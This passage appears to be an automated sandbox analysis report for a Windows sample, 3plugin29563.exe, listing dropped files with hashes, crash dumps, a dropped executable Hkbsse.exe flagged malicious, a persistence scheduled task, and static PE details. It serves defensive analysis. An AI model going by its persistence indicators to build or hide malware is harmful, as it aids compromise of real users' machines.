SHA-256:	FAF313FA4D746084D65E325813C43C2BB650AC405A43F3EB693337D1C9457EAF
SHA-512:	2386501507EC91510F183DF99E66D0B8A99BBA6018FDC0B5D3B24216027462FA1ABE6A9F0CAE880E2576004E30E5FF5C7A977ACEDD1A420C1264EA93FCC64DCF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB9A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.484922222154217
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VY8Ym8M4J8N0Fp+q8xFxWqN9d:uIjfEI7eK7VYJ8KmTWqN9d
MD5:	4908E12D394966A311B220F682FC8B53
SHA1:	3B1D4676CA5B21CE63CFDA6B544A8C7BF416B77C
SHA-256:	FAF8D1CF27BB46548B54CBC0F1BCF624E791DE6942A27098F07A3FB5F3831209
SHA-512:	18EE35216C03F491C66A47BCC6E526FA499FC8099E04C9F77BDB12E60B64AD2AF29ED7FFF464893088E9A8C9ED044C7C16228EBFAFF6683EE50F18D97C10A69D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD8C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	79564
Entropy (8bit):	2.0613633096991193
Encrypted:	false
SSDEEP:	384:THmg21zo7JMdc0DLUBkPoawlhJXiat3/WG1myJWi25:THmH1zo10D0kPoplhJNR+8JWi
MD5:	8D8D96EC0CA74C1A2C18648227E7000D
SHA1:	E127BB3600BB0C968471BC1AAD14BB87E9179DCC
SHA-256:	122E54D972F2D1B31D189F9B576EFD01D7D9DD5ABD5E1F3B0AEED2990B6739C2
SHA-512:	E35B7EA619D8E0C49127F4D75331BEE0117EEFB5E3CC28D147C1D2388D389D4A16FE4274E0537443A86BB73626DE91EAB440DB6529A0A16FE229A2FB64A9B8D6
Malicious:	false
Preview:	MDMP..a..... .......F..f........................\...............\|6..........T.......8...........T.......................................................................................................................eJ......l.......GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE29.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6328
Entropy (8bit):	3.7279023384333683
Encrypted:	false
SSDEEP:	192:R6l7wVeJzj6vuhgY7UpB989bdb/sfv/jm:R6lXJ36vvY7BRkfa
MD5:	BC7169CE8AC34A61CC9AB06520E3DCE4
SHA1:	DF27F75E34C8EB45881CFBDBE68AE08B633C830D
SHA-256:	B8B8015FDF5D701857F91143C22C4B67CCEA158F42CC04E95BED8F7DEB2CE3B1
SHA-512:	893325A49968FAEF5E25ABB5D22485B23A29A23231F277C5D001F51788809C4B7F3BD6F41A41EC651FF7F6103015A21181795DD45A56AC804507E3603C2DA26C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE59.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.484554677325503
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9g7WpW8VY+cYm8M4J8N0F0n+q8xFxWqN9d:uIjfdI7eK7V/5J8jmTWqN9d
MD5:	3EAF64355974C58745666647A8669EC4
SHA1:	2BFB0198C13543123A70513DC90801A2D6522074
SHA-256:	D75BD035057D27A868C80774DD41F6E8C592BB8ED9FC8BE9DFA494F0B8B3E8A0
SHA-512:	BE517DF82FC96B15EAC7183BEE9DC5270341E13070FFB41CF77D6BAA004086FC1B5F22AC999105997C2E11B84E767C29509A5D892F2D4F0DAE14C8D4C3F40D28
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFFD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	79476
Entropy (8bit):	2.083905030817981
Encrypted:	false
SSDEEP:	384:53mg2fz4C4DJMdc0UbUBkPoaxUXiat3/KOU7mYa:53mHfz4Ci0UEkPo+UNRSRmR
MD5:	F89398B8AE21A140DA3AE664D5875E1E
SHA1:	3DB8E61AE4A21AEBD5F513BA4389381EB84A767A
SHA-256:	3C65CBFA0AA1B0AA6C6F5520BBF5EB657B25DF9325FF036EB0545801C9BC24CC
SHA-512:	42F948C70BF09699479A09A834F5F651E378155FAB5B2F64C27F248F5FE47D07E712631A8F4C82485F56255F7FEA83686A9F055A43BB3E6AA32E68A2D12683E0
Malicious:	false
Preview:	MDMP..a..... .......G..f........................\...............\|6..........T.......8...........T...........(...L.......................................................................................................eJ......l.......GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC127.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6328
Entropy (8bit):	3.726290274031863
Encrypted:	false
SSDEEP:	192:R6l7wVeJzy6vp8hFY7UpBs89bdS/sfb/gm:R6lXJG6v2Y7CIkfR
MD5:	3969AD1985A031457C8BC08666D884B7
SHA1:	D6751ECF0BE9B34A62CD3BC5AE73D72C41BE0317
SHA-256:	E6B3F311AD2A56B0E07DBA12F058E306027B4A280C8C2019F59821B19F7BA7C9
SHA-512:	BF60A01F634022EE070930D68971416AE04F944A086791A0A294BF68D1515D517F6C9B43656A36945032CAE5EED892629AB5D2B1BCCC9B2AACF5F6D19556FCAC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC157.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.483822439440768
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9g7WpW8VY5Ym8M4J8N0FSV+q8xFxWqN9d:uIjfdI7eK7VNJ8nVmTWqN9d
MD5:	3FF624E7A6AD4D6229C75C82E1691A6E
SHA1:	00F5EF4F28CC2C191974E57F7FAAF36244C27DEE
SHA-256:	7A500D00D262FEC10BA049BA1D4A87A2F865B7264C43AD07476DA91647ED6ABD
SHA-512:	05C1D4E4551323F3877F1D8B78F834AD248E72BE604F4F96224D94671F02D2E1AE45248BC3F77E59922B96D135038735DFEC04864B2D886A588E619CCFA87117
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4B0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	89148
Entropy (8bit):	1.8977279790973263
Encrypted:	false
SSDEEP:	384:C+0tLUyzJpTJVdcBqfY50Gdat3/V5RhY1z6Ef:C+IrzXaBqw50GER9KzX
MD5:	042021C8E7FB46313D21C34827133E83
SHA1:	6A9F1D8A70E5A1B99D1A243E78202BFCB22B4D6B
SHA-256:	A7D67A2EAFD2F5175D109BBE678550186B42F0AB456855C06913DEC820B20026
SHA-512:	86FA0C309758E35EC6061EB0857C8C055CB470DF9C0109D73081BD1DE2EF166FDA290A2DD0EE6F8D8A16C5E5849CF193A9BEAD21CFCF4CFC91136BFB00137015
Malicious:	false
Preview:	MDMP..a..... .......H..f........................\...............t<..........T.......8...........T............ ...;..........H...........4...............................................................................eJ..............GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC52E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6328
Entropy (8bit):	3.7297321699557044
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbzJ6f6YdxFXgMC5aMOUF89bdA/sfQ/mm:R6l7wVeJzJ6f6Y7UpBF89bdA/sfQ/mm
MD5:	E9CCAFCA92B4214362FC4A581EDD02F0
SHA1:	C2D08284B35753C8CAD3723A161AA0FCE684D8D1
SHA-256:	1BDE13DE663907586F9A50D24BF6F690C27135F6BE980D8D5A92E0D9E7305802
SHA-512:	E82968217D368277A855AF0A81D6AAB8FED761E8C1E0A56C4FC99A1A09EF35F62CD1DC55A7E03869D23C5282B228D80AEB494AFE9694D7D4F510474586439378
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC54E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.482202948483352
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9g7WpW8VYXX5Ym8M4J8N0Fo+q8xFxWqN9d:uIjfdI7eK7VwoJ8DmTWqN9d
MD5:	5B1CD11786BA96EB7DE769AC3C85AF98
SHA1:	E6851A533D0B55D5A25CB70A38902704A62604AF
SHA-256:	DCC0C21D648FA8793CD1BDED67EC2B638BCAEF9F80449DEC1FA4982F22DA1E81
SHA-512:	B72C7B3522FACA0297B5726DF1F2C55B7A14782974AD50897FA0B67CBA05C04B7A0094ABF6F1ABF27B9613BA89FFF9981EEEFECFBF67409935225A64DC66414D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Download File

Process:	C:\Users\user\Desktop\3plugin29563.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	408576
Entropy (8bit):	6.893712869197874
Encrypted:	false
SSDEEP:	6144:mEI/n4oC5FTJdykBfGimmDkEu8mvjm4dZA2RAIw0pJ39tmHOI9zOJ0oJ:mEI/n4J5cO+immPWAypJ39t69I
MD5:	5886235E78709BA971A3B4CDFDC336EE
SHA1:	856E9688E3E087489D6D4EF02B7317D3CBC1FFF7
SHA-256:	059701AA60117A1ADC3C7FBAED00F05E72C97B28BCBD2456805DD6531654D970
SHA-512:	0699B612C13187F89E71B0008221DDDAB30C3ADAEF353C21B40FDA72F2487EEA874F2475F6E9A9A5A23855F20548DAE537FA97FCBEABFC1F266F5219DACDB244
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G../.i.\|.i.\|.i.\|l..\|.i.\|l.;\|.i.\|l..\|Si.\|..6\|.i.\|.i.\|\i.\|l..\|.i.\|l.?\|.i.\|l.8\|.i.\|Rich.i.\|........................PE..L....Kzd............................I.............@.........................................................................L...(....`..`$..................................................h....... ...@...............L............................text...*........................... ..`.rdata...".......$..................@..@.data....=..........................@....tls.........P......................@....rsrc...`....`...&..................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\3plugin29563.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\Desktop\3plugin29563.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.451640906138145
Encrypted:	false
SSDEEP:	6:L6HXUhXUEZ+lX1MGHe1metE9+AQy0l5lsl0lEt0:c4Q1MGHeq9+nV7seEt0
MD5:	9728C69D519338C0EC1AAD52582608F4
SHA1:	ADA04B8EC96F12CE67D58A86AD46F99EE0738F3E
SHA-256:	81AA76A8CEC4A884CA6C00155952A0068638BAB5B1DF0D3A27D46E66A598411A
SHA-512:	7AC6E203B20B4B9DF22ECC99EDBB500223BB81394EC4897422A90D13D2B9D93E89FBF527878CDFBB9A7AB6C425A60E0C5C3F9717DE6EE400E2CAD2D06BB81733
Malicious:	false
Preview:	.........~.N..H._..F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.2.3.9.f.1.7.a.f.5.a.\.H.k.b.s.s.e...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.471282761178122
Encrypted:	false
SSDEEP:	6144:bzZfpi6ceLPx9skLmb0fRZWSP3aJG8nAgeiJRMMhA2zX4WABluuNhjDH5Sq:XZHtRZWOKnMM6bFpvj4
MD5:	0441E14A0D4A58E342E9BBB492511631
SHA1:	E95AC5B8C0FB8037BF7DEB5042286DB136A939B9
SHA-256:	2DA328969EC1B04205AD87E8DFD6FB3EAB3F394863CDDF7EE6FF0A9DD0101BAA
SHA-512:	6A0C31F95CADB41B6CD0491B02AF235806B30CF9523367C85BC9C6421EB49E7B989819A9731546350CD6948147B845255181C4DEF7C0F276A95648B69C64097E
Malicious:	false
Preview:	regfW...W....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb..K{................................................................................................................................................................................................................................................................................................................................................"..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.893712869197874
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3plugin29563.exe
File size:	408'576 bytes
MD5:	5886235e78709ba971a3b4cdfdc336ee
SHA1:	856e9688e3e087489d6d4ef02b7317d3cbc1fff7
SHA256:	059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970
SHA512:	0699b612c13187f89e71b0008221dddab30c3adaef353c21b40fda72f2487eea874f2475f6e9a9a5a23855f20548dae537fa97fcbeabfc1f266f5219dacdb244
SSDEEP:	6144:mEI/n4oC5FTJdykBfGimmDkEu8mvjm4dZA2RAIw0pJ39tmHOI9zOJ0oJ:mEI/n4J5cO+immPWAypJ39t69I
TLSH:	E194DFA1B6A170B1FDEF873445B1EDB01AA67C52E6F0408E32FB365F1DB36404A69352
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G../.i.\|.i.\|.i.\|l..\|.i.\|l.;\|.i.\|l..\|Si.\|..6\|.i.\|.i.\|\i.\|l..\|.i.\|l.?\|.i.\|l.8\|.i.\|Rich.i.\|........................PE..L....Kzd...

File Icon


Icon Hash:	151a151210951209

Static PE Info

General

Entrypoint:	0x401649
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x647A4BD6 [Fri Jun 2 20:06:46 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	7104f45d3898c7272c98ee997c55432b

Entrypoint Preview

Instruction
call 00007F191CAFFCEBh
jmp 00007F191CAFD6AEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00452738h], eax
mov dword ptr [00452734h], ecx
mov dword ptr [00452730h], edx
mov dword ptr [0045272Ch], ebx
mov dword ptr [00452728h], esi
mov dword ptr [00452724h], edi
mov word ptr [00452750h], ss
mov word ptr [00452744h], cs
mov word ptr [00452720h], ds
mov word ptr [0045271Ch], es
mov word ptr [00452718h], fs
mov word ptr [00452714h], gs
pushfd
pop dword ptr [00452748h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045273Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00452740h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045274Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00452688h], 00010001h
mov eax, dword ptr [00452740h]
mov dword ptr [0045263Ch], eax
mov dword ptr [00452630h], C0000409h
mov dword ptr [00452634h], 00000001h
mov eax, dword ptr [00451004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00451008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C4h]

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4fb4c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0x12460	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
